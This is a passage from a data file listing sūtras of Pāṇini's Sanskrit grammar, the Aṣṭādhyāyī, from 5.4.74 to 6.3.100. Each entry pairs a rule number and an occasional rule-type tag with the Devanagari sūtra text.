डजबहुगणात्","5.4.74::ऋक्पूरप्धूःपथामानक्षे","5.4.75::अच् प्रत्यन्ववपूर्वात् सामलोम्नः","5.4.76::अक्ष्णोऽदर्शनात्","5.4.77::अचतुरविचतुरसुचतुरस्त्रीपुंसधेन्वनडुहर्क्सामवाङ्मनसाक्षिभ्रुवदारगवोर्वष्ठीवपदष्ठीवनक्तंदिवरत्रिंदिवाहर्दिवसरजसनिःश्रेयसपुरुषायुषद्व्यायुषत्र्यायुषर्ग्यजुषजातोक्षमहोक्षवृद्धोक्षोपशुनगोष्ठश्वाः","5.4.78::ब्रह्महस्तिभ्याम् वर्च्चसः","5.4.79::अवसमन्धेभ्यस्तमसः","5.4.80::श्वसो वसीयःश्रेयसः","5.4.81::अन्ववतप्ताद्रहसः","5.4.82::प्रतेरुरसः सप्तमीस्थात्","5.4.83::अनुगवमायामे","5.4.84::द्विस्तावा त्रिस्तावा वेदिः","5.4.85::उपसर्गादध्वनः","5.4.86::तत्पुरुषस्याङ्गुलेः संख्याऽव्ययादेः","5.4.87::अहस्सर्वैकदेशसंख्यातपुण्याच्च रात्रेः","5.4.88::अह्नोऽह्न एतेभ्यः","5.4.89::न संख्याऽऽदेः समाहारे","5.4.90::उत्तमैकाभ्यां च","5.4.91::राजाऽहस्सखिभ्यष्टच्","5.4.92::गोरतद्धितलुकि","5.4.93::अग्राख्यायामुरसः","5.4.94::अनोऽश्मायस्सरसाम् जातिसंज्ञयोः","5.4.95::ग्रामकौटाभ्यां च तक्ष्णः","5.4.96::अतेः शुनः","5.4.97::उपमानादप्राणिषु","5.4.98::उत्तरमृगपूर्वाच्च सक्थ्नः","5.4.99::नावो द्विगोः","5.4.100::अर्धाच्च","5.4.101::खार्याः प्राचाम्","5.4.102::द्वित्रिभ्यामञ्जलेः","5.4.103::अनसन्तान्नपुंसकाच्छन्दसि","5.4.104::ब्रह्मणो जानपदाख्यायाम्","5.4.105::कुमहद्भ्यामन्यतरस्याम्","5.4.106::द्वंद्वाच्चुदषहान्तात् समाहारे","5.4.107::अव्ययीभावे शरत्प्रभृतिभ्यः","5.4.108::अनश्च","5.4.109::नपुंसकादन्यतर्अस्याम्","5.4.110::नदीपौर्णमास्याग्रहायणीभ्यः","5.4.111::झयः","5.4.112::गिरेश्च सेनकस्य","5.4.113::बहुव्रीहौ सक्थ्यक्ष्णोः स्वाङ्गात् षच्","5.4.114::अङ्गुलेर्दारुणि","5.4.115::द्वित्रिभ्यां ष मूर्ध्नः","5.4.116::अप् पूरणीप्रमाण्योः","5.4.117::अन्तर्बहिर्भ्यां च लोम्नः","5.4.118::अञ्नासिकायाः संज्ञायां नसं चास्थूलात्","5.4.119::उपसर्गाच्च","5.4.120::सुप्रातसुश्वसुदिवशारिकुक्षचतुरश्रैणीपदाजपदप्रोष्ठपदाः","5.4.121::नञ्दुःसुभ्यो हलिसक्थ्योरन्यतरस्याम्","5.4.122::नित्यमसिच् प्रजामेधयोः","5.4.123::बहुप्रजाश्छन्दसि","5.4.124::धर्मादनिच् केवलात्","5.4.125::जम्भा सुहरिततृणसोमेभ्यः","5.4.126::दक्षिणेर्मा लुब्धयोगे","5.4.127::इच् कर्मव्यतिहारे","5.4.128::द्विदण्ड्यादिभ्यश्च","5.4.129::प्रसम्भ्यां जानुनोर्ज्ञुः","5.4.130::ऊर्ध्वाद्विभाषा","5.4.131::ऊधसोऽनङ्","5.4.132::धनुषश्च","5.4.133::वा संज्ञायाम्","5.4.134::जायाया निङ्","5.4.135::गन्धस्येदुत्पूतिसुसुरभिभ्यः","5.4.136::अल्पाख्यायाम्","5.4.137::उपमानाच्च","5.4.138::पादस्य लोपोऽहस्त्यादिभ्यः","5.4.139::कुम्भपदीषु च","5.4.140::संख्यासुपूर्वस्य","5.4.141::वयसि दन्तस्य दतृ","5.4.142::छन्दसि च","5.4.143::स्त्रियां संज्ञायाम्","5.4.144::विभाषा श्यावारोकाभ्याम्","5.4.145::अग्रान्तशुद्धशुभ्रवृषवराहेभ्यश्च","5.4.146::ककुदस्यावस्थायां लोपः","5.4.147::त्रिककुत् पर्वते","5.4.148::उद्विभ्यां काकुदस्य","5.4.149::पूर्णाद्विभाषा","5.4.150::सुहृद्दुर्हृदौ मित्रामित्रयोः","5.4.151::उरःप्रभृतिभ्यः कप्","5.4.152::इनः स्त्रियाम्","5.4.153::नद्यृतश्च","5.4.154::शेषाद्विभाषा","5.4.155::न संज्ञायाम्","5.4.156::ईयसश्च","5.4.157::वन्दिते भ्रातुः","5.4.158::ऋतश्छन्दसि","5.4.159::नाडीतन्त्र्योः स्वाङ्गे","5.4.160::निष्प्रवाणिश्च","6.1.1::एकाचो द्वे प्रथमस्य","6.1.2::अजादेर्द्वितीयस्य","6.1.3::न न्द्राः संयोगादयः","6.1.4:संज्ञा:पूर्वोऽभ्यासः","6.1.5:संज्ञा:उभे अभ्यस्तम्","6.1.6::जक्षित्यादयः षट्","6.1.7::तुजादीनां दीर्घोऽभ्यासस्य","6.1.8::लिटि धातोरनभ्यासस्य","6.1.9::सन्यङोः","6.1.10::श्लौ","6.1.11::चङि","6.1.12::दाश्वान् साह्वान् मीढ्वांश्च","6.1.13::ष्यङः सम्प्रसारणं पुत्रपत्योस्तत्पुरुषे","6.1.14::बन्धुनि बहुव्रीहौ","6.1.15::वचिस्वपियजादीनां किति","6.1.16::ग्रहिज्यावयिव्यधिवष्टिविचतिवृश्चतिपृच्छतिभृज्जतीनां ङिति च","6.1.17::लिट्यभ्यासस्योभयेषाम्","6.1.18::स्वापेश्चङि","6.1.19::स्वपिस्यमिव्येञां यङि","6.1.20::न वशः","6.1.21::चायः की","6.1.22::स्फायः स्फी निष्ठायाम्","6.1.23::स्त्यः प्रपूर्वस्य","6.1.24::द्रवमूर्तिस्पर्शयोः श्यः","6.1.25::प्रतेश्च","6.1.26::विभाषाऽभ्यवपूर्वस्य","6.1.27::शृतं पाके","6.1.28::प्यायः पी","6.1.29::लिड्यङोश्च","6.1.30::विभाषा श्वेः","6.1.31::णौ च संश्चङोः","6.1.32::ह्वः सम्प्रसारणम्","6.1.33::अभ्यस्तस्य च","6.1.34::बहुलं छन्दसि","6.1.35::चायः की","6.1.36::अपस्पृधेथामानृचुरानृहुश्चिच्युषेतित्याजश्राताःश्रितमाशीराशीर्त्तः","6.1.37::न सम्प्रसारणे सम्प्रसारणम्","6.1.38::लिटि वयो यः","6.1.39::वश्चास्यान्यतरस्याम् किति","6.1.40::वेञः","6.1.41::ल्यपि च","6.1.42::ज्यश्च","6.1.43::व्यश्च","6.1.44::विभाषा परेः","6.1.45::आदेच उपदेशेऽशिति","6.1.46::न व्यो लिटि","6.1.47::स्फुरतिस्फुलत्योर्घञि","6.1.48::क्रीङ्जीनां णौ","6.1.49::सिध्यतेरपारलौकिके","6.1.50::मीनातिमिनोतिदीङां ल्यपि च","6.1.51::विभाषा लीयतेः","6.1.52::खिदेश्छन्दसि","6.1.53::अपगुरो णमुलि","6.1.54::चिस्फुरोर्णौ","6.1.55::प्रजने वीयतेः","6.1.56::बिभेतेर्हेतुभये","6.1.57::नित्यं स्मयतेः","6.1.58::सृजिदृशोर्झल्यमकिति","6.1.59::अनुदात्तस्य चर्दुपधस्यान्यतरस्याम्","6.1.60::शीर्षंश्छन्दसि","6.1.61::ये च तद्धिते","6.1.62::अचि शीर्षः","6.1.63::पद्दन्नोमास्हृन्निशसन्यूषन्दोषन्यकञ्छकन्नुदन्नासञ्छस्प्रभृतिषु","6.1.64::धात्वादेः षः सः","6.1.65::णो नः","6.1.66::लोपो व्योर्वलि","6.1.67::वेरपृक्तस्य","6.1.68::हल्ङ्याब्भ्यो दीर्घात् सुतिस्यपृक्तं हल्","6.1.69::एङ्ह्रस्वात् सम्बुद्धेः","6.1.70::शेश्छन्दसि बहुलम्","6.1.71:अधिकारः:ह्रस्वस्य पिति कृति तुक्","6.1.72::संहितायाम्","6.1.73::छे च","6.1.74::आङ्माङोश्च","6.1.75::दीर्घात्","6.1.76::पदान्ताद्वा","6.1.77::इको यणचि","6.1.78::एचोऽयवायावः","6.1.79::वान्तो यि प्रत्यये","6.1.80::धातोस्तन्निमित्तस्यैव","6.1.81::क्षय्यजय्यौ शक्यार्थे","6.1.82::क्रय्यस्तदर्थे","6.1.83:अधिकारः:भय्यप्रवय्ये च च्छन्दसि","6.1.84::एकः पूर्वपरयोः","6.1.85:अतिदेशः:अन्तादिवच्च","6.1.86:अतिदेशः:षत्वतुकोरसिद्धः","6.1.87::आद्गुणः","6.1.88::वृद्धिरेचि","6.1.89::एत्येधत्यूठ्सु","6.1.90::आटश्च","6.1.91::उपसर्गादृति धातौ","6.1.92::वा सुप्यापिशलेः","6.1.93::औतोऽम्शसोः","6.1.94::एङि पररूपम्","6.1.95::ओमाङोश्च","6.1.96::उस्यपदान्तात्","6.1.97::अतो गुणे","6.1.98::अव्यक्तानुकरणस्यात इतौ","6.1.99::नाम्रेडितस्यान्त्यस्य तु वा","6.1.100::नित्यमाम्रेडिते डाचि","6.1.101::अकः सवर्णे दीर्घः","6.1.102::प्रथमयोः पूर्वसवर्णः","6.1.103::तस्माच्छसो नः पुंसि","6.1.104::नादिचि","6.1.105::दीर्घाज्जसि च","6.1.106::वा छन्दसि","6.1.107::अमि पूर्वः","6.1.108::सम्प्रसारणाच्च","6.1.109::एङः पदान्तादति","6.1.110::ङसिङसोश्च","6.1.111::ऋत उत्","6.1.112::ख्यत्यात् परस्य","6.1.113::अतो रोरप्लुतादप्लुते","6.1.114::हशि च","6.1.115::प्रकृत्याऽन्तःपादमव्यपरे","6.1.116::अव्यादवद्यादवक्रमुरव्रतायमवन्त्ववस्युषु च","6.1.117::यजुष्युरः","6.1.118::आपोजुषाणोवृष्णोवर्षिष्ठेऽम्बेऽम्बालेऽम्बिकेपूर्वे","6.1.119::अङ्ग इत्यादौ च","6.1.120::अनुदात्ते च कुधपरे","6.1.121::अवपथासि च","6.1.122::सर्वत्र विभाषा गोः","6.1.123::अवङ् स्फोटायनस्य","6.1.124::इन्द्रे च {नित्यम्}","6.1.125::प्लुतप्रगृह्या अचि नित्यम्","6.1.126::आङोऽनुनासिकश्छन्दसि","6.1.127::इकोऽसवर्णे शाकल्यस्य ह्रस्वश्च","6.1.128::ऋत्यकः","6.1.129:अतिदेशः:अप्लुतवदुपस्थिते","6.1.130::ई३ चाक्रवर्मणस्य","6.1.131::दिव उत्","6.1.132::एतत्तदोः सुलोपोऽकोरनञ्समासे हलि","6.1.133:अधिकारः:स्यश्छन्दसि बहुलम्","6.1.134::सोऽचि लोपे चेत् पादपूरणम्","6.1.135::सुट् कात् पूर्वः","6.1.136::अडभ्यासव्यवायेऽपि","6.1.137::सम्पर्युपेभ्यः करोतौ भूषणे","6.1.138::समवाये च","6.1.139::उपात् प्रतियत्नवैकृतवाक्याध्याहारेषु","6.1.140::किरतौ लवने","6.1.141::हिंसायां प्रतेश्च","6.1.142::अपाच्चतुष्पाच्छकुनिष्वालेखने","6.1.143::कुस्तुम्बुरूणि जातिः","6.1.144::अपरस्पराः क्रियासातत्ये","6.1.145::गोष्पदं सेवितासेवितप्रमाणेषु","6.1.146::आस्पदं प्रतिष्ठायाम्","6.1.147::आश्चर्यमनित्ये","6.1.148::वर्चस्केऽवस्करः","6.1.149::अपस्करो रथाङ्गम्","6.1.150::विष्किरः शकुनिर्विकरो वा","6.1.151::ह्रस्वाच्चन्द्रोत्तरपदे मन्त्रे","6.1.152::प्रतिष्कशश्च कशेः","6.1.153::प्रस्कण्वहरिश्चन्द्रावृषी","6.1.154::मस्करमस्करिणौ वेणुपरिव्राजकयोः","6.1.155::कास्तीराजस्तुन्दे नगरे","6.1.156::कारस्करो वृक्षः","6.1.157::पारस्करप्रभृतीनि च संज्ञायाम्","6.1.158:परिभाषा:अनुदात्तं पदमेकवर्जम्","6.1.159::कर्षात्वतो घञोऽन्त उदात्तः","6.1.160::उञ्छादीनां च","6.1.161::अनुदात्तस्य च यत्रोदात्तलोपः","6.1.162::धातोः","6.1.163::चितः","6.1.164::तद्धितस्य","6.1.165::कितः","6.1.166::तिसृभ्यो जसः","6.1.167::चतुरः शसि","6.1.168::सावेकाचस्तृतीयाऽऽदिविभक्तिः","6.1.169::अन्तोदत्तादुत्तरपदादन्यतरस्यामनित्यसमासे","6.1.170::अञ्चेश्छन्दस्यसर्वनामस्थानम्","6.1.171::ऊडिदम्पदाद्यप्पुम्रैद्युभ्यः","6.1.172::अष्टनो दीर्घात्","6.1.173::शतुरनुमो नद्यजादी","6.1.174::उदात्तयणो हल्पूर्वात्","6.1.175::नोङ्धात्वोः","6.1.176::ह्रस्वनुड्भ्यां मतुप्","6.1.177::नामन्यतरस्याम्","6.1.178::ङ्याश्छन्दसि बहुलम्","6.1.179::षट्त्रिचतुर्भ्यो हलादिः","6.1.180::झल्युपोत्तमम्","6.1.181::विभाषा भाषायाम्","6.1.182::न गोश्वन्त्साववर्णराडङ्क्रुङ्कृद्भ्यः","6.1.183::दिवो झल्","6.1.184::नृ चान्यतरस्याम्","6.1.185::तित्स्वरितम्","6.1.186::तास्यनुदात्तेन्ङिददुपदेशाल्लसार्वधातुकमनुदात्तमहन्विङोः","6.1.187::आदिः सिचोऽन्यतरस्याम्","6.1.188::स्वपादिर्हिंसामच्यनिटि","6.1.189::अभ्यस्तानामादिः","6.1.190::अनुदात्ते च","6.1.191::सर्वस्य सुपि","6.1.192::भीह्रीभृहुमदजनधनदरिद्राजागरां प्रत्ययात् पूर्वम् पिति","6.1.193::लिति","6.1.194::आदिर्णमुल्यन्यतरस्याम्","6.1.195::अचः कर्तृयकि","6.1.196::थलि च सेटीडन्तो वा","6.1.197::ञ्णित्यादिर्नित्यम्","6.1.198::आमन्त्रितस्य च","6.1.199::पथिमथोः सर्वनामस्थाने","6.1.200::अन्तश्च तवै युगपत्","6.1.201::क्षयो निवासे","6.1.202::जयः करणम्","6.1.203::वृषादीनां च","6.1.204::संज्ञायामुपमानम्","6.1.205::निष्ठा च द्व्यजनात्","6.1.206::शुष्कधृष्टौ","6.1.207::आशितः कर्ता","6.1.208::रिक्ते विभाषा","6.1.209::जुष्टार्पिते च छन्दसि","6.1.210::नित्यं मन्त्रे","6.1.211::युष्मदस्मदोर्ङसि","6.1.212::ङयि च","6.1.213::यतोऽनावः","6.1.214::ईडवन्दवृशंसदुहां ण्यतः","6.1.215::विभाषा वेण्विन्धानयोः","6.1.216::त्यागरागहासकुहश्वठक्रथानाम्","6.1.217::उपोत्तमं रिति","6.1.218::चङ्यन्यतरस्याम्","6.1.219::मतोः पूर्वमात् संज्ञायां स्त्रियाम्","6.1.220::अन्तोऽवत्याः","6.1.221::ईवत्याः","6.1.222::चौ","6.1.223::समासस्य","6.2.1::बहुव्रीहौ प्रकृत्या पूर्वपदम्","6.2.2::तत्पुरुषे तुल्यार्थतृतीयासप्तम्युपमानाव्ययद्वितीयाकृत्याः","6.2.3::वर्णः वर्णेष्वनेते","6.2.4::गाधलवणयोः प्रमाणे","6.2.5::दायाद्यं दायादे","6.2.6::प्रतिबन्धि चिरकृच्छ्रयोः","6.2.7::पदेऽपदेशे","6.2.8::निवाते वातत्राणे","6.2.9::शारदेअनार्तवे","6.2.10::अध्वर्युकषाययोर्जातौ","6.2.11::सदृशप्रतिरूपयोः सादृश्ये","6.2.12::द्विगौ प्रमाणे","6.2.13::गन्तव्यपण्यं वाणिजे","6.2.14::मात्रोपज्ञोपक्रमच्छाये नपुंसके","6.2.15::सुखप्रिययोर्हिते","6.2.16::प्रीतौ च","6.2.17::स्वं स्वामिनि","6.2.18::पत्यावैश्वर्ये","6.2.19::न भूवाक्चिद्दिधिषु","6.2.20::वा भुवनम्","6.2.21::आशङ्काबाधनेदीयस्सु संभावने","6.2.22::पूर्वे भूतपूर्वे","6.2.23::सविधसनीडसमर्यादसवेशसदेशेषु सामीप्ये","6.2.24::विस्पष्टादीनि गुणवचनेषु","6.2.25::श्रज्याऽवमकन्पापवत्सु भावे कर्मधारये","6.2.26::कुमारश्च","6.2.27::आदिः प्रत्येनसि","6.2.28::पूगेष्वन्यतरस्याम्","6.2.29::इगन्तकालकपालभगालशरावेषु द्विगौ","6.2.30::बह्वन्यतरस्याम्","6.2.31::दिष्टिवितस्त्योश्च","6.2.32::सप्तमी सिद्धशुष्कपक्वबन्धेष्वकालात्","6.2.33::परिप्रत्युपापा वर्ज्यमानाहोरात्रावयवेषु","6.2.34::राजन्यबहुवचनद्वंद्वेऽन्धकवृष्णिषु","6.2.35::संख्या","6.2.36::आचार्योपसर्जनश्चान्तेवासी","6.2.37::कार्तकौजपादयश्च","6.2.38::महान् व्रीह्यपराह्णगृष्टीष्वासजाबालभारभारतहैलिहिलरौरवप्रवृद्धेषु","6.2.39::क्षुल्लकश्च वैश्वदेवे","6.2.40::उष्ट्रः सादिवाम्योः","6.2.41::गौः सादसादिसारथिषु","6.2.42::कुरुगार्हपतरिक्तगुर्वसूतजरत्यश्लीलदृढरूपापारेवडवातैतिलकद्रूःपण्यकम्बलो दासीभाराणां च","6.2.43::चतुर्थी तदर्थे","6.2.44::अर्थे","6.2.45::क्ते च","6.2.46::कर्मधारयेऽनिष्ठा","6.2.47::अहीने द्वितीया","6.2.48::तृतीया कर्मणि","6.2.49::गतिरनन्तरः","6.2.50::तादौ च निति कृत्यतौ","6.2.51::तवै चान्तश्च युगपत्","6.2.52::अनिगन्तोऽञ्चतौ वप्रत्यये","6.2.53::न्यधी च","6.2.54::ईषदन्यतरस्याम्","6.2.55::हिरण्यपरिमाणं धने","6.2.56::प्रथमोऽचिरोपसम्पत्तौ","6.2.57::कतरकतमौ कर्मधारये","6.2.58::आर्यो ब्राह्मणकुमारयोः","6.2.59::राजा च","6.2.60::षष्ठी प्रत्येनसि","6.2.61::क्ते नित्यार्थे","6.2.62::ग्रामः शिल्पिनि","6.2.63::राजा च प्रशंसायाम्","6.2.64:अधिकारः:आदिरुदात्तः","6.2.65::सप्तमीहारिणौ धर्म्येऽहरणे","6.2.66::युक्ते च","6.2.67::विभाषाऽध्यक्षे","6.2.68::पापं च शिल्पिनि","6.2.69::गोत्रान्तेवासिमाणवब्राह्मणेषु क्षेपे","6.2.70::अङ्गानि मैरेये","6.2.71::भक्ताख्यास्तदर्थेषु","6.2.72::गोबिडालसिंहसैन्धवेषूपमाने","6.2.73::अके जीविकाऽर्थे","6.2.74::प्राचां क्रीडायाम्","6.2.75::अणि नियुक्ते","6.2.76::शिल्पिनि चाकृञः","6.2.77::संज्ञायां च","6.2.78::गोतन्तियवं पाले","6.2.79::णिनि","6.2.80::उपमानं शब्दार्थप्रकृतावेव","6.2.81::युक्तारोह्यादयश्च","6.2.82::दीर्घकाशतुषभ्राष्ट्रवटं जे","6.2.83::अन्त्यात् पूर्वं बह्वचः","6.2.84::ग्रामेऽनिवसन्तः","6.2.85::घोषादिषु","6.2.86::छात्र्यादयः शालायाम्","6.2.87::प्रस्थेऽवृद्धमकर्क्यादीनाम्","6.2.88::मालाऽऽदीनां च","6.2.89::अमहन्नवं नगरेऽनुदीचाम्","6.2.90::अर्मे चावर्णं द्व्यच्त्र्यच्","6.2.91::न भूताधिकसंजीवमद्राश्मकज्जलम्","6.2.92:अधिकारः:अन्तः","6.2.93::सर्वं गुणकार्त्स्न्ये","6.2.94::संज्ञायां गिरिनिकाययोः","6.2.95::कुमार्यां वयसि","6.2.96::उदकेऽकेवले","6.2.97::द्विगौ क्रतौ","6.2.98::सभायां नपुंसके","6.2.99::पुरे प्राचाम्","6.2.100::अरिष्टगौडपूर्वे च","6.2.101::न हास्तिनफलकमार्देयाः","6.2.102::कुसूलकूपकुम्भशालं बिले","6.2.103::दिक्शब्दा ग्रामजनपदाख्यानचानराटेषु","6.2.104::आचार्योपसर्जनश्चान्तेवासिनि","6.2.105::उत्तरपदवृद्धौ सर्वं च","6.2.106::बहुव्रीहौ विश्वं संज्ञयाम्","6.2.107::उदराश्वेषुषु","6.2.108::क्षेपे","6.2.109::नदी बन्धुनि","6.2.110::निष्ठोपसर्गपूर्वमन्यतरस्याम्","6.2.111:अधिकारः:उत्तरपदादिः","6.2.112::कर्णो वर्णलक्षणात्","6.2.113::संज्ञौपम्ययोश्च","6.2.114::कण्ठपृष्ठग्रीवाजंघं च","6.2.115::शृङ्गमवस्थायां च","6.2.116::नञो जरमरमित्रमृताः","6.2.117::सोर्मनसी अलोमोषसी","6.2.118::क्रत्वादयश्च","6.2.119::आद्युदात्तं द्व्यच् छन्दसि","6.2.120::वीरवीर्यौ च","6.2.121::कूलतीरतूलमूलशालाऽक्षसममव्ययीभावे","6.2.122::कंसमन्थशूर्पपाय्यकाण्डं द्विगौ","6.2.123::तत्पुरुषे शालायां नपुंसके","6.2.124::कन्था च","6.2.125::आदिश्चिहणादीनाम्","6.2.126::चेलखेटकटुककाण्डं गर्हायाम्","6.2.127::चीरमुपमानम्","6.2.128::पललसूपशाकं मिश्रे","6.2.129::कूलसूदस्थलकर्षाः संज्ञायाम्","6.2.130::अकर्मधारये राज्यम्","6.2.131::वर्ग्यादयश्च","6.2.132::पुत्रः पुंभ्यः","6.2.133::नाचार्यराजर्त्विक्संयुक्तज्ञात्याख्येभ्यः","6.2.134::चूर्णादीन्यप्राणिषष्ठ्याः","6.2.135::षट् च काण्डादीनि","6.2.136::कुण्डं वनम्","6.2.137::प्रकृत्या भगालम्","6.2.138::शितेर्नित्याबह्वज्बहुव्रीहावभसत्","6.2.139::गतिकारकोपपदात् कृत्","6.2.140::उभे वनस्पत्यादिषु युगपत्","6.2.141::देवताद्वंद्वे च","6.2.142::नोत्तरपदेऽनुदात्तादावपृथिवीरुद्रपूषमन्थिषु","6.2.143:अधिकारः:अन्तः","6.2.144::थाथघञ्क्ताजबित्रकाणाम्","6.2.145::सूपमानात् क्तः","6.2.146::संज्ञायामनाचितादीनाम्","6.2.147::प्रवृद्धादीनां च","6.2.148::कारकाद्दत्तश्रुतयोरेवाशिषि","6.2.149::इत्थम्भूतेन कृतमिति च","6.2.150::अनो भावकर्मवचनः","6.2.151::मन्क्तिन्व्याख्यानशयनासनस्थानयाजकादिक्रीताः","6.2.152::सप्तम्याः पुण्यम्","6.2.153::ऊनार्थकलहं तृतीयायाः","6.2.154::मिश्रं चानुपसर्गमसंधौ","6.2.155::नञो गुणप्रतिषेधे सम्पाद्यर्हहितालमर्थास्तद्धिताः","6.2.156::ययतोश्चातदर्थे","6.2.157::अच्कावशक्तौ","6.2.158::आक्रोशे च","6.2.159::संज्ञायाम्","6.2.160::कृत्योकेष्णुच्चार्वादयश्च","6.2.161::विभाषा तृन्नन्नतीक्ष्णशुचिषु","6.2.162::बहुव्रीहाविदमेतत्तद्भ्यः प्रथमपूरणयोः क्रियागणने","6.2.163::संख्यायाः स्तनः","6.2.164::विभाषा छन्दसि","6.2.165::संज्ञायां मित्राजिनयोः","6.2.166::व्यवायिनोऽन्तरम्","6.2.167::मुखं स्वाङ्गम्","6.2.168::नाव्ययदिक्शब्दगोमहत्स्थूलमुष्टिपृथुवत्सेभ्यः","6.2.169::निष्ठोपमानादन्यतरस्याम्","6.2.170::जातिकालसुखादिभ्योऽनाच्छादनात् क्तोऽकृतमितप्रतिपन्नाः","6.2.171::वा जाते","6.2.172::नञ्सुभ्याम्","6.2.173::कपि पूर्वम्","6.2.174::ह्रस्वान्तेऽन्त्यात् पूर्वम्","6.2.175::बहोर्नञ्वदुत्तरपदभूम्नि","6.2.176::न गुणादयोऽवयवाः","6.2.177::उपसर्गात् स्वाङ्गं ध्रुवमपर्शु","6.2.178::वनं समासे","6.2.179::अन्तः","6.2.180::अन्तश्च","6.2.181::न निविभ्याम्","6.2.182::परेरभितोभाविमण्डलम्","6.2.183::प्रादस्वाङ्गं संज्ञायाम्","6.2.184::निरुदकादीनि च","6.2.185::अभेर्मुखम्","6.2.186::अपाच्च","6.2.187::स्फिगपूतवीणाऽञ्जोऽध्वकुक्षिसीरनामनाम च","6.2.188::अधेरुपरिस्थम्","6.2.189::अनोरप्रधानकनीयसी","6.2.190::पुरुषश्चान्वादिष्टः","6.2.191::अतेरकृत्पदे","6.2.192::नेरनिधाने","6.2.193::प्रतेरंश्वादयस्तत्पुरुषे","6.2.194::उपाद् द्व्यजजिनमगौरादयः","6.2.195::सोरवक्षेपणे","6.2.196::विभाषोत्पुच्छे","6.2.197::द्वित्रिभ्यां पाद्दन्मूर्धसु बहुव्रीहौ","6.2.198::सक्थं चाक्रान्तात्","6.2.199::परादिश्छन्दसि बहुलम्","6.3.1::अलुगुत्तरपदे","6.3.2::पञ्चम्याः स्तोकादिभ्यः","6.3.3::ओजःसहोऽम्भस्तमसः तृतीयायाः","6.3.4::मनसः संज्ञायाम्","6.3.5::आज्ञायिनि च","6.3.6::आत्मनश्च पूरणे","6.3.7::वैयाकरणाख्यायां चतुर्थ्याः","6.3.8::परस्य च","6.3.9::हलदन्तात् सप्तम्याः संज्ञायाम्","6.3.10::कारनाम्नि च प्राचां हलादौ","6.3.11::मध्याद्गुरौ","6.3.12::अमूर्धमस्तकात् स्वाङ्गादकामे","6.3.13::बन्धे च विभाषा","6.3.14::तत्पुरुषे कृति बहुलम्","6.3.15::प्रावृट्शरत्कालदिवां जे","6.3.16::विभाषा वर्षक्षरशरवरात्","6.3.17::घकालतनेषु कालनाम्नः","6.3.18::शयवासवासिषु अकालात्","6.3.19::नेन्सिद्धबध्नातिषु","6.3.20::स्थे च भाषायाम्","6.3.21::षष्ठ्या आक्रोशे","6.3.22::पुत्रेऽन्यतरस्याम्","6.3.23::ऋतो विद्यायोनिसम्बन्धेभ्यः","6.3.24::विभाषा स्वसृपत्योः","6.3.25::आनङ् ऋतो द्वंद्वे","6.3.26::देवताद्वंद्वे च","6.3.27::ईदग्नेः सोमवरुणयोः","6.3.28::इद्वृद्धौ","6.3.29::दिवो द्यावा","6.3.30::दिवसश्च पृथिव्याम्","6.3.31::उषासोषसः","6.3.32::मातरपितरावुदीचाम्","6.3.33::पितरामातरा च च्छन्दसि","6.3.34:अतिदेशः:स्त्रियाः पुंवद्भाषितपुंस्कादनूङ् समानाधिकरणे स्त्रियामपूरणीप्रियाऽऽदिषु","6.3.35:अतिदेशः:तसिलादिषु आकृत्वसुचः","6.3.36:अतिदेशः:क्यङ्मानिनोश्च","6.3.37:अतिदेशः:न कोपधायाः","6.3.38:अतिदेशः:संज्ञापूरण्योश्च","6.3.39:अतिदेशः:वृद्धिनिमित्तस्य च तद्धितस्यारक्तविकारे","6.3.40:अतिदेशः:स्वाङ्गाच्चेतोऽमानिनि","6.3.41:अतिदेशः:जातेश्च","6.3.42:अतिदेशः:पुंवत् कर्मधारयजातीयदेशीयेषु","6.3.43::घरूपकल्पचेलड्ब्रुवगोत्रमतहतेषु ङ्योऽनेकाचो ह्रस्वः","6.3.44::नद्याः शेषस्यान्यतरस्याम्","6.3.45::उगितश्च","6.3.46::आन्महतः समानाधिकरणजातीययोः","6.3.47::द्व्यष्टनः संख्यायामबहुव्रीह्यशीत्योः","6.3.48::त्रेस्त्रयः","6.3.49::विभाषा चत्वारिंशत्प्रभृतौ सर्वेषाम्","6.3.50::हृदयस्य हृल्लेखयदण्लासेषु","6.3.51::वा शोकष्यञ्रोगेषु","6.3.52::पादस्य पदाज्यातिगोपहतेषु","6.3.53::पद् यत्यतदर्थे","6.3.54::हिमकाषिहतिषु च","6.3.55::ऋचः शे","6.3.56::वा घोषमिश्रशब्देषु","6.3.57::उदकस्योदः संज्ञायाम्","6.3.58::पेषंवासवाहनधिषु च","6.3.59::एकहलादौ पूरयितव्येऽन्यतरस्याम्","6.3.60::मन्थौदनसक्तुबिन्दुवज्रभारहारवीवधगाहेषु च","6.3.61::इको ह्रस्वोऽङ्यो गालवस्य","6.3.62::एक तद्धिते च","6.3.63::ङ्यापोः संज्ञाछन्दसोर्बहुलम्","6.3.64::त्वे च","6.3.65::इष्टकेषीकामालानां चिततूलभारिषु","6.3.66::खित्यनव्ययस्य","6.3.67::अरुर्द्विषदजन्तस्य मुम्","6.3.68:अतिदेशः:इच एकाचोऽम्प्रत्ययवच्च","6.3.69::वाचंयमपुरंदरौ च","6.3.70::कारे सत्यागदस्य","6.3.71::श्येनतिलस्य पाते ञे","6.3.72::रात्रेः कृति विभाषा","6.3.73::नलोपो नञः","6.3.74::तस्मान्नुडचि","6.3.75::नभ्राण्नपान्नवेदानासत्यानमुचिनकुलनखनपुंसकनक्षत्रनक्रनाकेषु प्रकृत्या","6.3.76::एकादिश्चैकस्य चादुक्","6.3.77::नगोऽप्राणिष्वन्यतरस्याम्","6.3.78::सहस्य सः संज्ञायाम्","6.3.79::ग्रन्थान्ताधिके च","6.3.80::द्वितीये चानुपाख्ये","6.3.81::अव्ययीभावे चाकाले","6.3.82::वोपसर्जनस्य","6.3.83::प्रकृत्याऽऽशिष्यगोवत्सहलेषु","6.3.84::समानस्य छन्दस्यमूर्धप्रभृत्युदर्केषु","6.3.85::ज्योतिर्जनपदरात्रिनाभिनामगोत्ररूपस्थानवर्णवयोवचनबन्धुषु","6.3.86::चरणे ब्रह्मचारिणि","6.3.87::तीर्थे ये","6.3.88::विभाषोदरे","6.3.89::दृग्दृशवतुषु","6.3.90::इदङ्किमोरीश्की","6.3.91::आ सर्वनाम्नः","6.3.92::विष्वग्देवयोश्च टेरद्र्यञ्चतौ वप्रत्यये","6.3.93::समः समि","6.3.94::तिरसस्तिर्यलोपे","6.3.95::सहस्य सध्रिः","6.3.96::सध मादस्थयोश्छन्दसि","6.3.97::द्व्यन्तरुपसर्गेभ्योऽप ईत्","6.3.98::ऊदनोर्देशे","6.3.99::अषष्ठ्यतृतीयास्थस्यान्यस्य दुगाशिराशाऽऽस्थाऽऽस्थितोत्सुकोतिकारकरागच्छेषु","6.3.100::अर्थे 